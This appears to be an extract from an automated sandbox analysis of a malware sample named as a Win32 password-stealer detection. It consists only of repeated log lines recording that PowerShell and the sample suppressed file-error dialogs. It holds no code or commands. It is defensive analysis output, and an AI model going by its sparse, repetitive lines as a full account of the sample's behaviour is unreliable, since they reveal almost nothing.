                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
